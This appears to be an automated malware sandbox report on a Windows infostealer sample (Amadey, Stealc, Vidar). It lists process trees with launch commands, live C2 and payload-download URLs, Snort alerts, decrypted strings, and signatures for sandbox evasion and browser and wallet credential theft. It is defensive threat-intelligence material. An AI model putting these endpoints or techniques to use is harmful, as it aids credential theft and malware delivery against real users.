Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1466647
MD5:acd738c0840861a12f13acff7c6fd7e5
SHA1:113b1470af40d3bd3a2af70f57390ba5d8b1162a
SHA256:dde34f614758e4d68e6732f7de0c9e210e6e8d56d65aae0f2cb1ee5d953d587c
Tags:exeStealc
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2104 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ACD738C0840861A12F13ACFF7C6FD7E5)
    • cmd.exe (PID: 3200 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • HCGCBFHCFC.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" MD5: E5063918FA59220D9ED0825CD9DB008D)
        • explorti.exe (PID: 1804 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: E5063918FA59220D9ED0825CD9DB008D)
          • a62ee169b8.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe" MD5: ACD738C0840861A12F13ACFF7C6FD7E5)
    • cmd.exe (PID: 1460 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorti.exe (PID: 6412 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: E5063918FA59220D9ED0825CD9DB008D)
  • explorti.exe (PID: 7468 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: E5063918FA59220D9ED0825CD9DB008D)
  • explorti.exe (PID: 7968 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: E5063918FA59220D9ED0825CD9DB008D)
  • explorti.exe (PID: 3728 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: E5063918FA59220D9ED0825CD9DB008D)
  • explorti.exe (PID: 7176 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: E5063918FA59220D9ED0825CD9DB008D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
{"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000011.00000002.3863894754.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      0000000F.00000002.2659626810.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000010.00000002.3262726628.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000A.00000002.4551252479.0000000000DA1000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000008.00000003.2280009907.0000000004A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 20 entries
              SourceRuleDescriptionAuthorStrings
              10.2.explorti.exe.da0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                8.2.HCGCBFHCFC.exe.7c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  11.2.explorti.exe.da0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    18.2.explorti.exe.da0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      16.2.explorti.exe.da0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        Click to see the 6 entries
                        No Sigma rule has matched
                        Timestamp:07/03/24-08:38:09.691399
                        SID:2044246
                        Source Port:49710
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/03/24-08:38:09.867325
                        SID:2051831
                        Source Port:80
                        Destination Port:49710
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/03/24-08:38:09.689673
                        SID:2051828
                        Source Port:80
                        Destination Port:49710
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/03/24-08:38:08.804823
                        SID:2044243
                        Source Port:49710
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/03/24-08:38:09.512644
                        SID:2044244
                        Source Port:49710
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeAvira: detected
                        Source: http://77.91.77.81/mine/amadka.exeAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/ZAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpB6Avira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/920475a59bac849d.php%Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/EM32Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.php5Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dlleAvira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.php/HnAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe-Disposition:Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dll%UAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe00Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/stealc/random.exe50673b5d7%Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/stealc/random.exeAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exe00Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.82/Hun4Ko/index.php#Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllPAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.php_Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INFAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/.Avira URL Cloud: Label: malware
                        Source: http://85.28.47.4/845-40f1-ac21-573d1d5ce43fAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllYAvira URL Cloud: Label: malware
                        Source: http://85.28.47.4/920475a59bac849d.phpzAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAppDataAvira URL Cloud: Label: phishing
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
                        Source: explorti.exe.1804.10.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
                        Source: http://85.28.47.4/Virustotal: Detection: 17%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpMVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.81/cost/go.exeVirustotal: Detection: 27%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exeVirustotal: Detection: 27%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.php%Virustotal: Detection: 6%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpVirustotal: Detection: 24%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.php5Virustotal: Detection: 10%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/mozglue.dllVirustotal: Detection: 7%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/nss3.dllVirustotal: Detection: 9%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe-Disposition:Virustotal: Detection: 25%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe00Virustotal: Detection: 25%Perma Link
                        Source: http://77.91.77.82/Virustotal: Detection: 23%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllVirustotal: Detection: 7%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://85.28.47.4/920475a59bac849d.phpVirustotal: Detection: 23%Perma Link
                        Source: http://77.91.77.81/stealc/random.exeVirustotal: Detection: 27%Perma Link
                        Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllVirustotal: Detection: 24%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeReversingLabs: Detection: 55%
                        Source: file.exeReversingLabs: Detection: 55%
                        Source: file.exeVirustotal: Detection: 48%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: INSERT_KEY_HERE
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetProcAddress
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: LoadLibraryA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: lstrcatA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: OpenEventA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CreateEventA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CloseHandle
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: Sleep
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetUserDefaultLangID
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: VirtualAllocExNuma
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: VirtualFree
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetSystemInfo
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: VirtualAlloc
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: HeapAlloc
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetComputerNameA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: lstrcpyA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetProcessHeap
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetCurrentProcess
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: lstrlenA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: ExitProcess
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetSystemTime
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: SystemTimeToFileTime
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: advapi32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: gdi32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: user32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: crypt32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: ntdll.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetUserNameA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CreateDCA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetDeviceCaps
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: ReleaseDC
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CryptStringToBinaryA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: sscanf
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: VMwareVMware
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: HAL9TH
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: JohnDoe
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: DISPLAY
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: %hu/%hu/%hu
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: http://85.28.47.4
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: /920475a59bac849d.php
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: /69934896f997d5bb/
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: jony
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetEnvironmentVariableA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetFileAttributesA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GlobalLock
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: HeapFree
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetFileSize
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GlobalSize
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: IsWow64Process
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: Process32Next
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetLocalTime
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: FreeLibrary
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetTimeZoneInformation
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetSystemPowerStatus
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetVolumeInformationA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetWindowsDirectoryA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: Process32First
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetLocaleInfoA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetModuleFileNameA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: DeleteFileA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: FindNextFileA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: LocalFree
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: FindClose
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: SetEnvironmentVariableA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: LocalAlloc
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetFileSizeEx
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: ReadFile
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: SetFilePointer
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: WriteFile
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CreateFileA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: FindFirstFileA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CopyFileA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: VirtualProtect
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetLastError
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: lstrcpynA
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: MultiByteToWideChar
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GlobalFree
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: WideCharToMultiByte
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GlobalAlloc
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: OpenProcess
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: TerminateProcess
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: GetCurrentProcessId
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: gdiplus.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: ole32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: bcrypt.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: wininet.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: shlwapi.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: shell32.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: psapi.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: rstrtmgr.dll
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: CreateCompatibleBitmap
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: SelectObject
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: BitBlt
                        Source: 12.2.a62ee169b8.exe.900000.0.unpackString decryptor: DeleteObject
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C9C6C80
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49710 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49710
                        Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
                        Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49710
                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
                        Source: Malware configuration extractorIPs: 77.91.77.82
